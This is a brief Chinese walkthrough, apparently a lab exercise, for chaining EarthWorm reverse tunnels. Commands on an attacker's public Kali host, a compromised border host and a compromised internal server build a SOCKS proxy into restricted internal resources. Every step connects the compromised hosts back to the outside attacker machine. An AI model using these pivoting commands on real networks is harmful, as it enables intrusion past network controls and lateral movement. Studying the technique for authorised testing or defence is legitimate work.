1.获得目标网络内两台主机 A、B 的权限，情况描述如下：

                A 主机：  目标网络的边界主机，无公网 IP，无法访问特定资源。
                B 主机：  目标网络内部主机，可访问特定资源，却无法回连公网。

                A 主机可直连 B 主机

 2.一台可控公网IP主机（kali）执行命令。

./ew -s lcx_listen -l 1080 -e 8888

// 在 1.1.1.1 公网主机添加转接隧道，将 1080 收到的代理请求

// 转交给反连 8888 端口的主机

3.可控内网主机A（win7）执行命令。注意这里需要修改IP，1.1.1.1为kali的IP，2.2.2.3为windows server 2016的IP（此处的IP与win7同网段）。

./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

// 在 2.2.2.2 上，通过工具的 lcx_slave 方式，打通1.1.1.1:8888 和 2.2.2.3:9999 之间的通讯隧道

 4.可访问指定资源的主机B（windows server 2016）执行命令。

./ew -s ssocksd -l 9999

// 在 2.2.2.3 主机上利用 ssocksd 方式启动 9999 端口的 socks 代理 

 5.测试连通性。

代理连通性测试成功